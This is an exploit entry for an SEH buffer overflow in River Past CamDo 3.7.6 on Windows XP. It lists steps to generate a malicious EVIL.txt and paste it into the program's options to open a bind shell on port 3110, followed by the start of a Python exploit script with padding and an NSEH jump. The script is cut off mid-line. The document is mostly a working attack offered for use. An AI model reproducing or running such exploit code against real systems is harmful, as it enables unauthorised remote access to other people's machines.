# Exploit Title: River Past CamDo SEH Local Exploit # Date: 07.02.2019 # Vendor Homepage:www.riverpast.com # Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1 # Exploit Author: Achilles # Tested Version: 3.7.6 # Tested on: Windows XP SP3 EN # 1.- Run python code : CamDo.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open CamDo.exe and click on the 'Options' Inside fhe 'File' Menu. # 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field. # 5.- Click 'OK' and you will have a bind shell port 3110. #!/usr/bin/env python import struct buffer = "\x41" * 280 NSEH = "\xeb\x06\x90\x90" #jmp short 6 SEH = struct.pack('